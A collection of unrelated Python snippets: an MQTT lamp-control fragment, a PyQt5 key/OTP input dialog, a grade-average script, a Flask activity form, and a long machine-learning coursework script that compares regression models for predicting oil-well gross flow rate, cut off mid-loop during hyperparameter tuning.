'rgb': [0, 0, 255]
}
cmd1 = {
'command': 'set_ring',
'ring': (i+1)%3,
'rgb': [0, 0, 0]
}
cmds.append(cmd)
cmds1.append(cmd1)
t=time.time()
i=0
while t + dt > time.time():
client.publish("laumio/{}/json".format(boule), json.dumps(cmds[i]))
client.publish("laumio/{}/json".format(boule), json.dumps(cmds1[i]))
i=(i+1)%3
time.sleep(0.5)
client = mqtt.Client()
client.connect("mpd.lan")
pluie(client, "Laumio_D454DB", 20)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '.\InputKey.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_DialogInputKeyWindow(object):
def setupUi(self, DialogInputKeyWindow):
DialogInputKeyWindow.setObjectName("DialogInputKeyWindow")
DialogInputKeyWindow.resize(303, 129)
self.gridLayout = QtWidgets.QGridLayout(DialogInputKeyWindow)
self.gridLayout.setObjectName("gridLayout")
self.label_2 = QtWidgets.QLabel(DialogInputKeyWindow)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 2, 0, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(DialogInputKeyWindow)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setCenterButtons(True)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 4, 0, 1, 1)
self.label = QtWidgets.QLabel(DialogInputKeyWindow)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.lineEditKey = QtWidgets.QLineEdit(DialogInputKeyWindow)
self.lineEditKey.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEditKey.setObjectName("lineEditKey")
self.gridLayout.addWidget(self.lineEditKey, 1, 0, 1, 1)
self.lineEditOTP = QtWidgets.QLineEdit(DialogInputKeyWindow)
self.lineEditOTP.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEditOTP.setObjectName("lineEditOTP")
self.gridLayout.addWidget(self.lineEditOTP, 3, 0, 1, 1)
self.retranslateUi(DialogInputKeyWindow)
self.buttonBox.accepted.connect(DialogInputKeyWindow.accept)
self.buttonBox.rejected.connect(DialogInputKeyWindow.reject)
QtCore.QMetaObject.connectSlotsByName(DialogInputKeyWindow)
def retranslateUi(self, DialogInputKeyWindow):
_translate = QtCore.QCoreApplication.translate
DialogInputKeyWindow.setWindowTitle(_translate("DialogInputKeyWindow", "Input Key"))
self.label_2.setText(_translate("DialogInputKeyWindow", "OTP를 입력하세요."))
self.label.setText(_translate("DialogInputKeyWindow", "복호화 키를 입력하세요."))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
DialogInputKeyWindow = QtWidgets.QDialog()
ui = Ui_DialogInputKeyWindow()
ui.setupUi(DialogInputKeyWindow)
DialogInputKeyWindow.show()
sys.exit(app.exec_())
|
n1 = float(input('Digite a Nota 1: '))
n2 = float(input('Digite a Nota 2: '))
mediaNotas = (n1+n2)/2
print('A NF foi: {}!'.format(mediaNotas))
if mediaNotas < 5.0:
print('REPROVADO!')
elif mediaNotas < 7.0:
print('RECUPERAÇÃO')
else:
print('APROVADO!')
|
#-*- coding: utf-8 -*-
"""
forms/activity.py
~~~~~~~~~~~~~~~~~~
Defines the activity-related forms
"""
from flask.ext import wtf
from scriptfan.forms import RedirectForm
class ActivityForm(RedirectForm):
title = wtf.TextField(u'活动标题', validators=[ \
wtf.Required(message=u'请为活动填写一个标题')])
content = wtf.TextAreaField(u'活动简介', validators=[ \
wtf.Length(min=10, max=5000, message=u'简介至少10个字')])
start_time = wtf.TextField(u'开始时间', validators=[ \
wtf.Required(message=u'需要指定开始时间')])
end_time = wtf.TextField(u'结束时间', validators=[ \
wtf.Required(message=u'需要指定结束时间')])
address = wtf.TextField(u'活动地点')
latitude = wtf.HiddenField()
longitude = wtf.HiddenField()
|
# Code for CS229 Final
import numpy as np
import sklearn as skl
import skimage as ski
import pandas as pd
import matplotlib.pyplot as plt
import xlrd
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
from sklearn import linear_model
from sklearn import preprocessing
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import Pipeline
from sklearn.linear_model import Ridge
from sklearn.neural_network import MLPRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error
from sklearn.datasets import make_friedman1
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.ensemble import ExtraTreesRegressor
from sklearn.feature_selection import SelectFromModel
from sklearn.datasets import make_regression
# Seed the randomness of the simulation so this outputs the same thing each time
np.random.seed(0)
# Reading the data
# You need to put the location of the data on your computer between ''
Data = pd.read_excel ('RawData.xlsx', sheet_name='All_OL')
df = pd.DataFrame(Data, columns = ['Group', 'Gross', 'Oil', 'Water', 'waterCut', 'GOR', 'GLR',
'FWHP', 'Press', 'Temp', 'chokeSize', 'CHK_US', 'CHK_DS'])
df2 = pd.DataFrame(Data, columns = ['Gross', 'GLR', 'FWHP', 'Temp', 'chokeSize', 'GOR'])
# Reading and Defining Features
Gross = df[['Gross']]
GLR = df[['GLR']]
FWHP = df[['FWHP']]
Temp = df[['Temp']]
chokeSize = df[['chokeSize']]
PDS = df[['CHK_DS']]
WC = df[['waterCut']]
WC = 100 - WC.to_numpy()
df_arr = df.to_numpy()
DP = df_arr[ : ,7] - df_arr[ : ,12]
Pratio = df_arr[ : ,12]/df_arr[ : ,7]
Crit = Pratio <= 0.5
SubCrit = Pratio > 0.5
df_arr2 = df_arr[Crit,:]
Gross = Gross[ : ]
GLR = GLR[ : ]
FWHP = FWHP[ : ]
Temp = Temp[ : ]
chokeSize = chokeSize[ : ]
PTSGLR = FWHP.to_numpy()*Temp.to_numpy()*chokeSize.to_numpy()/GLR.to_numpy()
Gillbert = 0.1*FWHP.to_numpy()*np.power(chokeSize.to_numpy(), 1.89)/np.power(GLR.to_numpy(), 0.546)
Slog = np.log(chokeSize)
GLRwc = GLR.to_numpy()*WC
DPPratio = DP/df_arr[ : ,7]
TPratio = df_arr[ : ,9]/df_arr[ : ,7]
Slog_inv = 1.0/Slog
# Gross/Pressure
array1 = np.array(df_arr[ : ,7] - df_arr[ : ,12])
DP = np.where(array1==0, 1, array1)
GrossP = df_arr[:,1]/(df_arr[:,7])
df2[['Gross']] = GrossP
# Plotting Gross flowrate vs. different features
fig = plt.figure()
fig.set_size_inches(20.5, 3.5, forward=True)
plt.subplot(1, 5, 1)
plt.plot(GLR, Gross, 'o', color='blue')
plt.xlabel('GLR (SCF/STB)')
plt.ylabel('Gross (bbl/Day)')
plt.title('Gross vs. GLR')
plt.subplot(1, 5, 2)
plt.plot(FWHP, Gross, 'o', color='red')
plt.xlabel('FWHP (psi)')
plt.title('Gross vs. FWHP')
plt.subplot(1, 5, 3)
plt.plot(Temp, Gross, 'o', color='yellow')
plt.xlabel('Temperature (F)')
plt.title('Gross vs. Temperature')
plt.subplot(1, 5, 4)
plt.plot(chokeSize, Gross, 'o', color='green')
plt.xlabel('Choke Size')
plt.title('Gross vs. Choke Size')
plt.subplot(1, 5, 5)
plt.plot(DP, Gross, 'o', color='purple')
plt.xlabel('DP(psi)')
plt.title('Gross vs. DP')
plt.savefig('All in one_All Data.png')
plt.close()
# Adding all possible features and pd to np and random permutation
df2_arr = df2.to_numpy()
df2_arr = np.append(df2_arr, np.reshape(DP, (DP.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(WC, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(PTSGLR, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(Gillbert, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(Slog, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(GLRwc, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(DPPratio, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(TPratio, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(Slog_inv, (WC.shape[0],1)), axis=1)
df2_arr = np.append(df2_arr, np.reshape(Crit+1, (WC.shape[0],1)), axis=1)
# Fields Info
#Field A: 0,1488
#Field B: 1489,3058
#Field C: 3059:
BeginIdx = 0
EndIdx = -1
df2_arr = df2_arr[BeginIdx:EndIdx,:]
# For calling fields A and C
#df2_arr = df2_arr[np.r_[0:1488,3059:-1],:]
df2_arr = df2_arr.astype(int)
for i in range(df2_arr.shape[0]):
for j in range(df2_arr.shape[1]):
if df2_arr[i,j] == 0:
df2_arr[i,j] = 1
df2_arr = df2_arr[:]
df2_arr = df2_arr[np.random.permutation(df2_arr.shape[0]), :]
# Calculating Mean and std
df2_mean = np.mean(df2_arr, axis = 0)
df2_std = np.std(df2_arr, axis = 0)
# Excluding outliers (out of 3sigma)
df2_filt_3s = [x for x in df2_arr if (x[0] > df2_mean[0] - 3 * df2_std[0])]
df2_filt_3s = [x for x in df2_filt_3s if (x[0] < df2_mean[0] + 3 * df2_std[0])]
for i in range(5):
df2_filt_3s = [x for x in df2_filt_3s if (x[i+1] > df2_mean[i+1] - 3 * df2_std[i+1])]
df2_filt_3s = [x for x in df2_filt_3s if (x[i+1] < df2_mean[i+1] + 3 * df2_std[i+1])]
ymax = 10000
df2_filt_3s = [x for x in df2_filt_3s if (x[0]*x[2] < ymax)]
df2_filt_3s = np.array(df2_filt_3s)
df2_filt = df2_filt_3s
n = df2_filt.shape[0]
m = int(n * 0.8)
Idx = [1,3,4,5,6,7,12,15]
train_y = df2_filt[:m,0]
train_x = df2_filt[:m,Idx]
test_y = df2_filt[m:,0]
test_x = df2_filt[m:,Idx]
# Gilbert
Gillbert_train = df2_filt[:m,9]
Gillbert_test = df2_filt[m:,9]
# Plotting measured vs. Predicted Gross flowrate
plt.figure()
plt.scatter(test_y*df2_filt[m:,2], Gillbert_test, color='blue', linewidth=1)
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.savefig('Gillbert Correlation.png')
plt.close()
R2Score = r2_score(test_y*df2_filt[m:,2], Gillbert_test)
print('Score:', R2Score)
Correlation_Coefficient_Gilbert = np.corrcoef(test_y*df2_filt[m:,2], Gillbert_test)[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_Gilbert)
# Features' Standardization
scaler = preprocessing.StandardScaler().fit(train_x)
train_x = scaler.transform(train_x)
test_x = scaler.transform(test_x)
# Linear Regression
Linreg = linear_model.LinearRegression()
Linreg.fit(train_x, train_y)
Coefficients = Linreg.coef_
Bias = Linreg.intercept_
# Make predictions using the testing set
Gross_pred = Linreg.predict(test_x)
# Plot outputs
plt.figure()
LinregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Linear Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_Linreg = Linreg.score(train_x, train_y)
print('Train_Score:',Train_Score_Linreg)
Test_Score_Linreg = Linreg.score(test_x, test_y)
print('Test_Score:',Test_Score_Linreg)
Correlation_Coefficient_Linreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_Linreg)
plt.savefig('Linear Regression.png')
plt.close()
# Ridge Regression
Ridgreg = linear_model.Ridge(alpha=.5)
Ridgreg.fit(train_x, train_y)
Coefficients = Ridgreg.coef_
Bias = Ridgreg.intercept_
# Make predictions using the testing set
Gross_pred = Ridgreg.predict(test_x)
# Plot outputs
plt.figure()
RidgregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Ridge Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_Ridgreg = Ridgreg.score(train_x, train_y)
print('Train_Score:',Train_Score_Ridgreg)
Test_Score_Ridgreg = Ridgreg.score(test_x, test_y)
print('Test_Score:',Test_Score_Ridgreg)
Correlation_Coefficient_Ridgreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_Ridgreg)
plt.savefig('Ridge Regression.png')
plt.close()
# Bayesian Regression
Bayreg = linear_model.BayesianRidge()
Bayreg.fit(train_x, train_y)
Coefficients = Bayreg.coef_
Bias = Bayreg.intercept_
# Make predictions using the testing set
Gross_pred = Bayreg.predict(test_x)
# Plot outputs
plt.figure()
BayregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Bayesian Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_Bayreg = Bayreg.score(train_x, train_y)
print('Train_Score:',Train_Score_Bayreg)
Test_Score_Bayreg = Bayreg.score(test_x, test_y)
print('Test_Score:',Test_Score_Bayreg)
Correlation_Coefficient_Bayreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_Bayreg)
plt.savefig('Bayesian Regression.png')
plt.close()
# Polynomial Linear Regression
PolyLinreg = Pipeline([('poly', PolynomialFeatures(degree = 2)), ('linear', LinearRegression(fit_intercept=False))])
PolyLinreg.fit(train_x, train_y)
Coefficients = PolyLinreg.named_steps['linear'].coef_
# Make predictions using the testing set
Gross_pred = PolyLinreg.predict(test_x)
# Plot outputs
plt.figure()
PolyLinregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Polynomial Linear Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_PolyLinreg = PolyLinreg.score(train_x, train_y)
print('Train_Score:',Train_Score_PolyLinreg)
Test_Score_PolyLinreg = PolyLinreg.score(test_x, test_y)
print('Test_Score:',Test_Score_PolyLinreg)
Correlation_Coefficient_PolyLinreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_PolyLinreg)
plt.savefig('Polynomial Linear Regression.png')
plt.close()
# Polynomial Ridge Regression
BestAlpha = 0
BestScore = 0
BestDegree = 0
for i in range(0,5,1):
for j in range(1,5):
alpha = i/10
PolyRidgreg = Pipeline([('poly', PolynomialFeatures(degree = j)), ('linear', Ridge(alpha=alpha,fit_intercept=False))])
PolyRidgreg.fit(train_x, train_y)
Coefficients = PolyRidgreg.named_steps['linear'].coef_
#print(Coefficients)
# Make predictions using the testing set
Gross_pred = PolyRidgreg.predict(test_x)
Test_Score = PolyRidgreg.score(test_x, test_y)
if Test_Score>BestScore:
BestAlpha = alpha
BestScore = Test_Score
BestDegree = j
print(BestAlpha)
print(BestDegree)
print(BestScore)
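# Optional reference (kept commented out so the workflow above is unchanged): the same
# degree/alpha search could be written with sklearn's GridSearchCV; parameter names
# follow the 'step__param' convention of the Pipeline defined above.
# from sklearn.model_selection import GridSearchCV
# grid = GridSearchCV(
#     Pipeline([('poly', PolynomialFeatures()), ('linear', Ridge(fit_intercept=False))]),
#     {'poly__degree': range(1, 5), 'linear__alpha': [i / 10 for i in range(0, 5)]},
#     cv=3).fit(train_x, train_y)
# print(grid.best_params_, grid.best_score_)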
PolyRidgreg = Pipeline([('poly', PolynomialFeatures(degree = BestDegree)), ('linear', Ridge(alpha=BestAlpha,fit_intercept=False))])
PolyRidgreg.fit(train_x, train_y)
Coefficients = PolyRidgreg.named_steps['linear'].coef_
#print(Coefficients)
# Make predictions using the testing set
Gross_pred = PolyRidgreg.predict(test_x)
# Plot outputs
plt.figure()
PolyRidgregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Polynomial Ridge Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_PolyRidgreg = PolyRidgreg.score(train_x, train_y)
print('Train_Score:',Train_Score_PolyRidgreg)
Test_Score_PolyRidgreg = PolyRidgreg.score(test_x, test_y)
print('Test_Score:',Test_Score_PolyRidgreg)
Correlation_Coefficient_PolyRidgreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_PolyRidgreg)
plt.savefig('Polynomial Ridge Regression.png')
plt.close()
# Multi Layer Perceptron Regression
MLPreg = MLPRegressor(hidden_layer_sizes = (10,),
activation = 'relu',
solver = 'adam',
learning_rate = 'constant',
max_iter = 1000,
learning_rate_init = 0.001,
alpha = 0.1)
MLPreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = MLPreg.predict(test_x)
# Plot outputs
plt.figure()
MLPregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Multi Layer Perceptron Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_MLPreg = MLPreg.score(train_x, train_y)
print('Train_Score:',Train_Score_MLPreg)
Test_Score_MLPreg = MLPreg.score(test_x, test_y)
print('Test_Score:',Test_Score_MLPreg)
Correlation_Coefficient_MLPreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_MLPreg)
plt.savefig('Multi Layer Perceptron Regression.png')
plt.close()
# Nearest Neighbor Regression
neighReg = KNeighborsRegressor(n_neighbors=3, weights='uniform', algorithm='auto',
leaf_size=30, p=2, metric='minkowski',
metric_params=None, n_jobs=None)
neighReg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = neighReg.predict(test_x)
# Plot outputs
plt.figure()
neighRegPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Nearest Neighbor Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_neighReg = neighReg.score(train_x, train_y)
print('Train_Score:',Train_Score_neighReg)
Test_Score_neighReg = neighReg.score(test_x, test_y)
print('Test_Score:',Test_Score_neighReg)
Correlation_Coefficient_neighReg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_neighReg)
plt.savefig('Nearest Neighbor Regression.png')
plt.close()
# Random Forest Regression
RFreg = RandomForestRegressor(n_estimators=100, criterion='mse', max_depth=None,
min_samples_split=2, min_samples_leaf=1,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=True, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
RFreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = RFreg.predict(test_x)
# Plot outputs
plt.figure()
RFregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Random Forest Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_RFreg = RFreg.score(train_x, train_y)
print('Train_Score:',Train_Score_RFreg)
Test_Score_RFreg = RFreg.score(test_x, test_y)
print('Test_Score:',Test_Score_RFreg)
Correlation_Coefficient_RFreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_RFreg)
plt.savefig('Random Forest Regression.png')
plt.close()
# Gradient Tree Boosting Regression
GTBreg = GradientBoostingRegressor(n_estimators=100, learning_rate=0.01,
max_depth=10, random_state=0, loss='ls')
GTBreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = GTBreg.predict(test_x)
# Plot outputs
plt.figure()
GTBregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Gradient Tree Boosting')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_GTBreg = GTBreg.score(train_x, train_y)
print('Train_Score:',Train_Score_GTBreg)
Test_Score_GTBreg = GTBreg.score(test_x, test_y)
print('Test_Score:',Test_Score_GTBreg)
Correlation_Coefficient_GTBreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_GTBreg)
plt.savefig('Gradient Tree Boosting.png')
plt.close()
# Extra Trees Regression
XTreg = ExtraTreesRegressor(n_estimators=100, criterion='mse', max_depth=None,
min_samples_split=2, min_samples_leaf=1,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=False, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
XTreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = XTreg.predict(test_x)
# Plot outputs
plt.figure()
XTregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Extra Trees Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_XTreg = XTreg.score(train_x, train_y)
print('Train_Score:',Train_Score_XTreg)
Test_Score_XTreg = XTreg.score(test_x, test_y)
print('Test_Score:',Test_Score_XTreg)
Correlation_Coefficient_XTreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_XTreg)
plt.savefig('Extra Trees Regression.png')
plt.close()
#plotting Results
fig = plt.figure()
fig.set_size_inches(20.5, 7, forward=True)
plt.subplot(2, 5, 1)
LinregPlot = plt.scatter(test_y*df2_filt[m:,2], Linreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Linear Regression')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 2)
RidgregPlot = plt.scatter(test_y*df2_filt[m:,2], Ridgreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Ridge Regression')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 3)
BayregPlot = plt.scatter(test_y*df2_filt[m:,2], Bayreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Bayesian Regression')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 4)
PolyLinregPlot = plt.scatter(test_y*df2_filt[m:,2], PolyLinreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Polynomial Linear Regression')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 5)
PolyRidgregPlot = plt.scatter(test_y*df2_filt[m:,2], PolyRidgreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Polynomial Ridge Regression')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 6)
MLPregPlot = plt.scatter(test_y*df2_filt[m:,2], MLPreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Multi Layer Perceptron Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 7)
RFregPlot = plt.scatter(test_y*df2_filt[m:,2], RFreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Random Forest Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 8)
GTBregPlot = plt.scatter(test_y*df2_filt[m:,2], GTBreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Gradient Tree Boosting')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 9)
neighRegPlot = plt.scatter(test_y*df2_filt[m:,2], neighReg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Nearest Neighbor Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 10)
XTregPlot = plt.scatter(test_y*df2_filt[m:,2], XTreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Extra Trees Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.savefig('All Results - All Data.png')
plt.close()
# Plotting Top-3 Models Results
fig = plt.figure()
fig.set_size_inches(12.3, 3.5, forward=True)
plt.subplot(1, 3, 1)
XTregPlot = plt.scatter(test_y*df2_filt[m:,2], XTreg.predict(test_x)*df2_filt[m:,2], color='green', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Extra Trees Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(1, 3, 2)
RFregPlot = plt.scatter(test_y*df2_filt[m:,2], RFreg.predict(test_x)*df2_filt[m:,2], color='green', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Random Forest Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(1, 3, 3)
neighRegPlot = plt.scatter(test_y*df2_filt[m:,2], neighReg.predict(test_x)*df2_filt[m:,2], color='green', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Nearest Neighbor Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.savefig('Top 3 - All Fields.png')
plt.close()
n = df2_filt.shape[0]
m = int(n * 0.8)
print(n)
v = int(n * 0.9)
Idx = [1,3,4,5,6,7,12,15]
train_y = df2_filt[:m,0]
train_x = df2_filt[:m,Idx]
test_y = df2_filt[m:v,0]
test_x = df2_filt[m:v,Idx]
valid_y = df2_filt[v:,0]
valid_x = df2_filt[v:,Idx]
# Extra Trees Regression Hyperparameter Tuning
BestEst = 0
BestScore = 0
BestSplit = 0
BestLeaf = 0
for i in range(100,150,10):
for j in range(2,4,1):
for k in range(1,3,1):
XTreg = ExtraTreesRegressor(n_estimators=i, criterion='mse', max_depth=None,
min_samples_split=j, min_samples_leaf=k,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=False, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
XTreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = XTreg.predict(test_x)
Test_Score = XTreg.score(test_x, test_y)
if Test_Score>BestScore:
BestEst = i
BestScore = Test_Score
